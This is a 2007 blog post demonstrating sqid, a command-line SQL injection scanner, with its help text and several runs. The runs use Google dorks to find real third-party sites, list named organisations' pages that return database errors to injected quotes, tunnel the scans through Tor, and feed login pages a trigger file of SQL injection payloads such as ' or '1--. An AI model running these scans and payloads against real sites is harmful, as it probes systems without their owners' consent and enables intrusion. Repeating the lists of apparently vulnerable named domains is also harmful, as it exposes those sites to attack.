Saturday, July 14, 2007

Using sqid (SQL Injection Digger) to look for SQL Injection


SQL injection digger is a command line program that looks for SQL injections and common errors in websites.
It can perform the following operations:
  • Look for SQL injection in a webpage, by looking for links.
  • Submit forms in a webpage to look for SQL injection.
  • Crawl a website to perform the above listed operations.
  • Perform a google search for a query and look for SQL injections in the urls found.
http://sqid.rubyforge.org/

Let's see it in action

sqid run with the help (-h) argument:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -h
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

Usage: sqid.rb [options]

options:
-m, --mode MODE Operate in mode MODE.
MODE is one of
g,google Operate in google search mode.
u,url Check this url or a file with urls.
p,page Check single page.
c,crawl Crawl website and check.

Google search mode options:

-q, --query QUERY QUERY to perforn google search for.
-s, --start START zero-based index of the first desired result,
zero if not specified.
-r, --results RESULTS number of results desired, default is 20 if not specfied.
rounded to tens.

URL check mode options:
-u, --url URL check this URL.
If URL is a file urls will be loaded from this file, specify each url on a new line.

Page check mode options:

-p, --page PAGE Check this page.

Crawl mode options:
-c, --crawl WEBSITE Crawl website WEBSITE and check.
specify as http[s]://WESITE:[PORT], default PORT is 80

URL, Page and Crawl mode common options:
-C, --cookie COOKIE Cookie in the HTTP header specify as name=value,name=value.
If COOKIE is a file cookies will be loaded from this file, specify each cookie on a new line.

-a, --accept-cookies Accept cookies from the webite or page. Default is no.
-R, --referer REFERER Set referer in the HTTP header.
-B, --auth CREDENTIALS Use credentials as basic auth for the website.
specify as user:password.

Common options:

-o, --with-noquery Match page content without query parameters. Default is false.
-D, --db-files FILE,...,FILE Use file(s) FILE,...,FILE as signature database.
-t, --trigger TRIGGER Use TRIGGER for detecting SQL injections/errors default is '.
If TRIGGER is a file triggers will be loaded from it. specify each trigger on newline.

Lines starting with a # are ignored.

-T, --time-out TIMEOUT Timeout for response in seconds.
Default is 10 seconds.

-U, --user-agent USERAGENT User Agent in the HTTP Header. Default is SQID/0.3.
-P, --proxy
PROXY User HTTP proxy PROXY for operations.
specfify as proxy:port.
-A, --proxy-auth CREDENTIALS Use crendtials CRENDENTIALS for the proxy.
specfify as user:password.

-v, --verbose Run verbosely.
-h, --help Show this message


Let's play with the google query:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -m g -q inurl:page.asp -s 0 -r 50
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

[+] Getting 50 links from search inurl:page.asp starting from 0.
[+] Done got 50 links.
[*] Going to check 50 urls.

500 VBScript / ASP error => http://www.ddcf.org/page.asp?pageId='
500 MS-SQL Server error => http://www.unctad.org/Templates/Page.asp?intItemID='
500 MS-SQL Server error => http://www.aacp.org/site/page.asp?CID='&DID=3079
500 MS-SQL Server error => http://www.aacp.org/site/page.asp?CID=72&DID='
500 VBScript / ASP error => http://www.airweb.org/page.asp?page='
500 VBScript runtime error => http://www.airweb.org/page.asp?page='
Timed out => http://www.pebblebeach.com/page.asp?id='
500 VBScript / ASP error => http://www.royalsoc.ac.uk/page.asp?id='
500 VBScript runtime error => http://www.royalsoc.ac.uk/page.asp?id='
500 ADODB Error => http://www.yased.org.tr/page.asp?pageid='
500 VBScript / ASP error => http://www.neighbourhood.gov.uk/page.asp?id='
500 VBScript runtime error => http://www.neighbourhood.gov.uk/page.asp?id='
500 VBScript / ASP error => http://www.browsealoud.com/page.asp?pg_id='
500 VBScript runtime error => http://www.browsealoud.com/page.asp?pg_id='
[*] Warning: Client error 404 Page not found, http://policyresearch.gc.ca/page.asp?pagenm='.
500 VBScript runtime error => http://philanthropy.moodys.com/page.asp?template='&context=cmr&section=hglts
500 No match => http://philanthropy.moodys.com/page.asp?template=cmr&context='&section=hglts
Error getaddrinfo: No address associated with nodename, http://www.airindiaexpress.co.in/page.asp?pageid='.
500 VBScript runtime error => http://www.bscs.org/page.asp?pageid='&id=0%7Cevolution_programs
500 VBScript / ASP error => http://www.televue.com/engine/page.asp?cat='
500 VBScript runtime error => http://www.televue.com/engine/page.asp?cat='
500 MS-Access error => http://www.northernirelandscreen.co.uk/page.asp?id='
500 No match => http://www.airindia.com/page.asp?pageid='
500 MS-SQL Server error => http://www.seaair.info/page.asp?page='

[*] Checked 44 URLs.


closer look at the query; sqid.rb -m g -q inurl:page.asp -s 0 -r 50

-q query = "inurl:page.asp"
-s start with result 0
-r return 50 results

You can use sqid to check a URL:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -m u -u http://www.site.info/page.asp?page=
sqid v0.3 - SQL Injection digger.

Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org


[*] Going to check 1 urls.


500 MS-SQL Server error => http://www.site.info/page.asp?page='


[*] Checked 1 URLs.


You can use sqid to check a page:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -m p -p http://www.site.info/
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

[+] Getting links from page http://www.site.info/.

[*] Invalid URL: bad URI(is not URI?): %20http://www.site.org.za

[+] Done got 2 links.

[*] Going to check 2 urls.

500 MS-SQL Server error => http://www.site.info/page.asp?page='

[*] Checked 2 URLs.

You can use sqid to crawl a site as well:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -v -m c -c http://www.carnal0wnage.com/
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

[v] Loaded 21 signatures from sqid.db.
[+] Crawling http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/main.html.
[v] Getting http://www.carnal0wnage.com/papers.html.
[v] Getting http://www.carnal0wnage.com/hackvideos/index.html.
[v] Getting http://www.carnal0wnage.com/rootwars.html.
[v] Getting http://www.carnal0wnage.com/rootwars/Sept2nd2006_T1_RootWar_Shell_Logz.html.

[v] Getting http://www.carnal0wnage.com/rootwars/Sept2nd2006_T3_RootWar_Shell_Logz.html.
[v] Getting http://www.carnal0wnage.com/research.html.
[v] Getting http://www.carnal0wnage.com//research/PyDNSmap.py.
[v] Getting http://www.carnal0wnage.com/research/clearseclog.rb.
[v] Getting http://www.carnal0wnage.com/research/clearalllog.rb.
[v] Getting http://www.carnal0wnage.com/about.html.
[v] Getting http://www.carnal0wnage.com/links.html.
[v] Getting http://www.carnal0wnage.com//pvt/phackvideos.html.
[*] Warning: Client error 401 Authorization Required, http://www.carnal0wnage.com//pvt/phackvideos.html.
[+] Done got 32 links.
[*] Going to check 32 urls.

[v] Checking URL http://www.carnal0wnage.com/main.html.
[v] Checking URL http://www.carnal0wnage.com/papers.html.
[v] Checking URL http://www.carnal0wnage.com/hackvideos/index.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars/Sept2nd2006_T1_RootWar_Shell_Logz.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars/Sept2nd2006_T2_RootWar_Shell_Logz.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars/Sept2nd2006_T3_RootWar_Shell_Logz.html.
[v] Checking URL http://www.carnal0wnage.com/research.html.
[v] Checking URL http://www.carnal0wnage.com//research/PyDNSmap.py.
[v] Checking URL http://www.carnal0wnage.com/research/clearseclog.rb.
[v] Checking URL http://www.carnal0wnage.com/research/clearalllog.rb.
[v] Checking URL http://www.carnal0wnage.com/about.html.
[v] Checking URL http://www.carnal0wnage.com/links.html.
[v] Checking URL http://www.carnal0wnage.com//pvt/phackvideos.html.

[*] Checked 32 URLs.

Tunnel that stuff through TOR:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -v -P localhost:8118 -m c -c http://www.carnal0wnage.com/
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

[v] Loaded 21 signatures from sqid.db.
[+] Crawling http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/main.html.
[v] Getting http://www.carnal0wnage.com/papers.html.
[v] Getting http://www.carnal0wnage.com/hackvideos/index.html.
[v] Getting http://www.carnal0wnage.com/rootwars.html.
[v] Getting http://www.carnal0wnage.com/rootwars/Sept2nd2006_T1_RootWar_Shell_Logz.html.
---snip---

by default, sqid will only check for SQL injection with " ' " you can add your own trigger file if you want.

adding a trigger file:
SegFault:~/sqid/sqid cg$ cat trigger2
'
' or '1
' or ' 1
' or '1--
' or ' 1--


SegFault:~/sqid/sqid cg$ ruby sqid.rb -P localhost:8118 -m g -q inurl:login.asp -t trigger2
sqid v0.3 - SQL Injection digger.

Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

[+] Getting 20 links from search inurl:login.asp starting from 0.

[+] Done got 20 links.

[*] Going to check 20 urls.


500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='
500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='

500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1

500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1

500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201

500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201

500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1--

500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1--

500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201--%20

500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201--%20

----snip

-CG
CG

No comments: